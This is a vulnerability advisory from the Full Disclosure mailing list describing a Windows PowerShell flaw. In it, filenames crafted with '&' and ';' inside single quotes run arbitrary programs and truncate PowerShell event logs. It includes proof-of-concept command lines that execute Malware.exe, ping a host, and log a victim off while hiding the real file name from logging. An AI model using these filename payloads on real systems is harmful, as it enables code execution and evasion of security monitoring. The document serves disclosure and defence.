From: hyp3rlinx <apparitionsec () gmail com>
Date: Wed, 27 Dec 2023 20:28:00 -0500
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] twitter.com/malvuln
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows PowerShell
Built on the . NET Framework, Windows PowerShell helps IT professionals and
power users control and automate the administration of the Windows
operating system and applications that run on Windows.
[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass
[CVE Reference]
N/A
[Security Issue]
In past times I disclosed how PowerShell executes unintended files or
BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line
single quote bypass and PS event logging failure.
On Windows CL tab completing a filename uses double quotes that can be
leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that is
until now.
[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it
bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";" delimits the .XML extension and helps trigger
the PE file specified in the case DOOM.exe and the PS event log gets
truncated.
Take the following three test cases using Defender API which takes a
specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"
1) Double quotes OK
"Test;saps DOOM;.xml"
2) Single quotes FAILS
'Test;saps DOOM;.xml'
3) Single quotes BYPASS
'Test&DOOM;.xml'
PowerShell API calls that prefix the "powershell" cmd is a requirement and
may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath
'C:\Users\gg\Downloads\Infected&Malware;.zip'
Malware.exe lives in Downloads dir, notice how we only need a partial name
as part of the .ZIP archive filename we are scanning here
and that it also excludes the .EXE portion in that filename.
[PS Event Log Bypass]
On Windows PowerShell event logging can be enabled to alert a SOC on
suspicious activity and or for incident response forensic artifact purposes.
However, when bypassing PS single quotes, I noticed an interesting side
effect. The ampersand "&" character seems to truncate the PS event log.
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs
'infected' and not the true name of 'Malware.exe' which was actually
executed.
Want to mask the true name of the file from PowerShell Event logging?
(Malware.exe lives in the same directory)
C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Below the event log HostApplication contains 'infected' and not the true
name of Malware.exe that was actually executed due to truncating.
[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=25
HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682
[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip'
-algorithm md5
PE file Malware.exe in the Downloads directory, notice the .zip we are
scanning doesn't include .exe in the filename.
Defender Anti-Malware API:
powershell Start-MpScan -Scanpath
'C:\Users\gg\Downloads\Infected&Malware;.zip'
Call ping cmd using double "&":
C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5
Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'
We have options:
A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&"
with ";" --> 'Infected&Malware;.zip'
[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is
hereby granted for the redistribution of this advisory, provided that it is
not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and accepts
no responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security related
information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Windows PowerShell Single Quote Code Execution / Event Log Bypass hyp3rlinx (Jan 04)